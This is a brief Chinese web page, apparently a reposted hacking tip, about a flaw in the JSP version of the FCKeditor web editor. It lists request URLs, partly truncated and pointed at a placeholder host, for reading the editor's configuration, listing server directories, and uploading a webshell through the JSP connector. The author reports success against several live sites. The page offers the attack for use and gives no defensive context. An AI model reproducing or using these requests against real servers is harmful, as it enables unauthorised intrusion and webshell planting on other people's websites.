FCKeditor的JSP版漏洞 -電腦資料

電腦資料 時(shí)間:2019-01-01 我要投稿
【clearvueentertainment.com - 電腦資料】

    查看配置和列出目錄下的文件.

    http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F

    http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F

    上傳shell的地址:

    http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector

    跟版本有關(guān)系.并不是百分百成功. 測試成功幾個(gè)站.

    不能通殺.很遺憾.

最新文章